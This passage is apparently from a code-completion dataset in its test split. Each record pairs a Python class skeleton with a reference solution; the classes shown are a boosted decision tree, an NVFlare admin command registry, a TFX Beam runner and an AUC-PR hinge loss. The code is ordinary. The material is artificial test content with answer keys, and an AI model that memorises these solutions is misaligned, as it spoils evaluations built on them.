Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\n- def predict(self, X): Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions", "prompted_full_text": "Implement the Python class `BoostedDT` described below.\n\nClass description:\nImplement the BoostedDT class.\n\nMethod signatures and docstrings:\n- def __init__(self, numBoostingIters=100, maxTreeDepth=3): Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\n- def fit(self, X, y, random_state=None): Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\n- def predict(self, X): Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\n\n<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "revision_id": "fa7c71a8cd8ca9d12260dbc6a737f34715fe3b87", "skeleton": "<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing 
individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BoostedDT:\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n", "source": "the_stack_v2_python_sparse", "source_path": "HW4/HW4_code/cis519_hw4_solution.py", "source_repo": "JiatongSun/CIS-519-Applied-Machine-Learning", "split": "test", "star_events_count": 0} {"blob_id": "87db28f295ad2d4b4f2d696f22ddce5ec1ffee86", "bodies": ["for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\nreturn None", "if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\nAdminCommands.commands.append(command_processor)"], "bodies_text": "<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return 
None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "class_docstring": "AdminCommands contains all the commands for processing the commands from the parent process.", "class_name": "AdminCommands", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000012", "length_bytes": 7851, "license_type": "permissive", "methods": [{"docstring": "Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object", "name": "get_command", "signature": "def get_command(command_name)"}, {"docstring": "Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor", "name": "register_command", "signature": "def register_command(command_processor: CommandProcessor)"}], "n_methods": 2, "prompt": "Implement the Python class `AdminCommands` described below.\n\nClass description:\nAdminCommands contains all the commands for processing the commands from the parent process.\n\nMethod signatures and docstrings:\n- def get_command(command_name): Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\n- def register_command(command_processor: CommandProcessor): Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor", "prompted_full_text": "Implement the Python class `AdminCommands` described below.\n\nClass description:\nAdminCommands contains all the commands for processing the commands from the parent process.\n\nMethod signatures and docstrings:\n- def get_command(command_name): Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\n- def register_command(command_processor: CommandProcessor): Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\n\n<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. 
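[Editor's illustration] A hedged sketch of how the AdminCommands registry above is exercised. Only get_command_name is known about CommandProcessor from this record, so a stub stands in for it; the concrete processor, the 'shutdown' name, and the explicit reset of the class-level commands list (the record never shows its initialization) are invented for the example.

    class CommandProcessor:
        def get_command_name(self):
            raise NotImplementedError

    class ShutdownProcessor(CommandProcessor):
        def get_command_name(self):
            return 'shutdown'

    AdminCommands.commands = []   # assumed class-level registry used by both methods
    AdminCommands.register_command(ShutdownProcessor())
    assert AdminCommands.get_command('shutdown').get_command_name() == 'shutdown'
    assert AdminCommands.get_command('unknown') is None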
Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "revision_id": "1433290c203bd23f34c29e11795ce592bc067888", "skeleton": "<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n", "source": "the_stack_v2_python_sparse", "source_path": "nvflare/private/fed/client/admin_commands.py", "source_repo": "NVIDIA/NVFlare", "split": "test", "star_events_count": 442} {"blob_id": "c02f37436a99f11fd5cb7ef52ce60f6d97445224", "bodies": ["if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\nsuper().__init__(config)\nself._beam_orchestrator_args = beam_orchestrator_args", "tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\nwith telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 
'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)"], "bodies_text": "<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "class_docstring": "Tfx runner on Beam.", "class_name": "BeamDagRunner", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. 
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000013", "length_bytes": 6857, "license_type": "permissive", "methods": [{"docstring": "Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.", "name": "__init__", "signature": "def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None)"}, {"docstring": "Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "name": "run", "signature": "def run(self, tfx_pipeline: pipeline.Pipeline) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `BeamDagRunner` described below.\n\nClass description:\nTfx runner on Beam.\n\nMethod signatures and docstrings:\n- def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None): Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Deploys given logical pipeline on Beam. 
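[Editor's illustration] A minimal, hedged usage sketch for the runner above. create_pipeline is a hypothetical helper returning a tfx pipeline.Pipeline, and the Beam flag shown is just one plausible DirectRunner option; neither comes from this record.

    # Hypothetical: assemble a tfx pipeline.Pipeline elsewhere.
    tfx_pipeline = create_pipeline()

    # Per the record's docstring, beam_orchestrator_args configure the
    # *orchestrating* Beam pipeline, not the beam_pipeline_args that
    # individual components use for their own Beam jobs.
    runner = BeamDagRunner(beam_orchestrator_args=['--direct_running_mode=multi_processing'])
    runner.run(tfx_pipeline)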
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "prompted_full_text": "Implement the Python class `BeamDagRunner` described below.\n\nClass description:\nTfx runner on Beam.\n\nMethod signatures and docstrings:\n- def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None): Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\n\n<|skeleton|>\nclass BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass 
BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. 
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/beam/legacy/beam_dag_runner.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "4973df93e71c46326b7b21ffaa5220b55befbf3c", "bodies": ["super().__init__()\nprecision_range_lower = 0.0\nprecision_range_upper = 1.0\nself.num_classes = num_classes\nself.num_anchors = num_anchors\nself.precision_range = (precision_range_lower, precision_range_upper)\nprecision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\nself.register_buffer('precision_values', precision_values)\nself.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\nself.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))", "targets = targets['target']\nC = 1 if logits.dim() == 1 else logits.size(1)\nif self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\nlabels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\nlambdas = lagrange_multiplier(self.lambdas)\nhinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\nclass_priors = build_class_priors(labels, weights=weights)\nlambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\nper_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\nloss = per_anchor_loss.sum(2) * self.delta\nloss = loss / (self.precision_range[1] - self.precision_range[0])\nif not reduce:\n return loss\nelif size_average:\n return loss.mean()\nelse:\n return loss.sum()", "N, C = logits.size()\nlabels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\nif weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\nif weights.dim() == 1:\n weights.unsqueeze_(-1)\nreturn (labels, weights)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n 
self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "class_docstring": "area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives", "class_name": "AUCPRHingeLoss", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. 
